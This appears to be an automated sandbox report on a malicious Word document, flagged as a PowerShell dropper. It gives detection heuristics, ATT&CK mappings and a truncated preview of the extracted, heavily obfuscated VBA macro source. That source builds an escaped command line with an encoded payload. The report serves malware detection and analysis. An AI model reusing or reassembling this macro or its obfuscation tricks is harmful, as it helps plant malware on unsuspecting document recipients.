MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicated by the OLE_VBA_SHELL heuristic, and is flagged as an auto-executing macro (AutoOpen). The ClamAV detection name 'Doc.Dropper.Powload-6665575-0' suggests it acts as a dropper for a PowerShell payload. The macro's obfuscated string concatenation likely reconstructs a command to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Powload-6665575-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Powload-6665575-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10417 bytes |
SHA-256: 3a4f2b5197ad6f8b47798091dd4a5987e6eed1c1ff78c66e06f9258456ee6942 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HmKVOZRlvJw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "pffPRGhYozs" Function triVjoPnY() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error 61325 / fNizz Error 79705 * ELkFOb / 37199 / NDYnFR Error rCzDO * PnBwBO rYZBEHzWkmf = "M" + "D /v^:^" + "O " + " /R " + Chr(2 + 0 + 5 + 2 + 25) + " ^s^e" + "^" + "T ^ ^" + " ^ H^" Error nXITif * KSWcoB UWJInWJTrt = "D^u^o==" + "AAIAA" + "CAg" + "^AA^I^A" + "ACAg^AA" + "^IA^" + "AC^A^g" + "AA^I" + "A" + "AC^A^gA" + "AI^" Error XmApw * VPQjj Error JrRWUG * NYBbd / 2955 * DzwrAS Error AEntf * 50499 / 7776 * LiXjd JBZRbu = "A^ACA^" + "gAAIAA" + "C^A9B^" + "Q^" + "fAs" + "^H^A" + "o" + "^B^wYA" + "^QH^" + "AhBw^" + "Y^" + "A^0HA7" Error VioMLH * FVXZGY / MdEar / rDwCR XwXimJJFw = "A^" + "waA" + "EGAl" + "Bgc^AI" + "^" + "G" + "A" + "7^A^wc^" + "AQ^F^" + "A^" + "y^" + "B^AJA^" Error scUiTw / oftNGv Error 12193 / bmihj / wraaD / lmuDc uRPmhOlXjfN = "ACAt" + "^B^" + "QZAQHA" + "^J^BQL" + "A" + "^U^GA" + "r" + "^B" + "w^bA" + "YH" + "A^" Error 85560 * vmcWY / 96722 * NkTwz Error IIjjlz / zCbpHT * 36344 * 81881 Error 85945 / sVFLCG / Ojotf / lfOuwP Error CLLPl / 58623 / HGUuLP / iJiLa Error fdzrij / EttdCs / 97732 * iuhNC UKUErUwnwM = "u^B^QS^" + "A^" + "s^DAp" + "^AwcA^Q" + "F^" + "AyBA^J" + "A^" + "AC" + "^" + "As^A^w" + "^b^A^8^" Error iislFR * ztdUQc / 52591 * 11512 Error EUWjEu / CPwnG Error MYcRHn / hNDXI zJmvEuSPk = "G^" + "A^pB^" + "AJ^A" + "gCAlBA" + "^b^A^" + "k^G^" + "A^GBAZ^" + "A^E^GAv" + "^B^A^" + "bA4G^" + "A^3^" Error wOBXid / 71873 * KbucEr * NpaoP Error 29201 * VkjLTV * 22853 / 10390 Error uBAMJ / diAjk fFVAsjmlwoz = "B" + "wbAQE" + "A^u^A^w" + "^U^A^" + "QG" + "^A6B^A" Error 36898 * BlzfS Error 40088 / UHWVW Error 89295 * ritwIs Error 77582 / UzWVTb * jaNrH * YrFqdv DzGSDBYilNt = "^J^AsH" + "A5Bgc" + "^" + "A^" + "QH^A7^B" + "^Q" + "KAc^" + "H^Ap" + "^BA" + "c" + "AQCAgA" Error 83971 / BfiwaL * cusppT / zfIoc Error 37630 / zFwXzF bajApJLOcn = "^g" + "b^Ak" + "GAg^Aw^" + "bA" + "^8GAp^B" + "A^JA^" + "gC" + "^A" + "^o^" + "B^" + "wY^A^E^" Error 83390 * lEZOKv XnLKCALrUIS = "G^A^l" + "^B" + "gcA^8" + "G^AmB" + "^w^O^" + "AcC" Error fzofZ * uZqNZ * 72985 / 43817 Error 1641 * EPojU * jtEoi * aZVFj Error 47900 / YzDLcZ BUHGIbvK = "A" + "l" + "^" + "B^Ae^" + "A^UG" + "^AuA" triVjoPnY = rYZBEHzWkmf + UWJInWJTrt + JBZRbu + XwXimJJFw + uRPmhOlXjfN + UKUErUwnwM + zJmvEuSPk + fFVAsjmlwoz + DzGSDBYilNt + bajApJLOcn + XnLKCALrUIS + BUHGIbvK Error 33734 / OjAilz * WnFYn / VlGpV End Function Function FzvlhpU() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error 45394 / GwMSjW * 79643 / nAiPbX Error GXHEkz / rGXwww AraDr = "w^JA" + "sC^" + "A^q^Bg" + "^Q^Ao" + "G^A" + "k^A" + "wKAcC^A" Error 93879 / FULLX Error 75844 / ovpEGY Error 75584 / XQrtFE Error BSpmlS * BBnwq Error 1111 / KYijB GSRtMmKuUjw = "cB" + "w^J" + "^A^" + "s" + "CAj^B" + "^Q" + "a^A^w" + "^G^" + "A^" + "i" + "^B^Q^d" Error 88328 * aDPqG Error tOZzhi * mPGZmm / vANYr / RhfiQ Error duuSO * HaJmYu Error mOlBr / NOcNmj RFLHPi = "A^A^" + "H^A^6A" + "g^dA" + "4G^A^l^" + "B" Error iJDmin * WbrOj Error zjGtHt * DBROfh FfZWKtEOYf = "A^J^A0" + "^DA^z" + "B^A" + "VA^IH" + "A" Error TmItGi * IGhGbj Error iURNEG * mHwzY Error JHzaj * bWFTEi / lYzFJ * jJuREm oFiwX = "^k^A" + "w^O" + "^" + "Ac" + "CA3A^" + "g" + "^M^A" + "Y^D^An" + "^A" + "^AI^A0D" + "^Ag^Ag" + "^aAIEA" + "q^B^" Error wIZzQ * Itpkp / Pqtot * IkzZw OaBmZUskTR = "A^J^AsD" + "ApA^w" + "^J" + "^" + "A^A^E^A" + "nAA" + "K^A^Q^H" + " ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.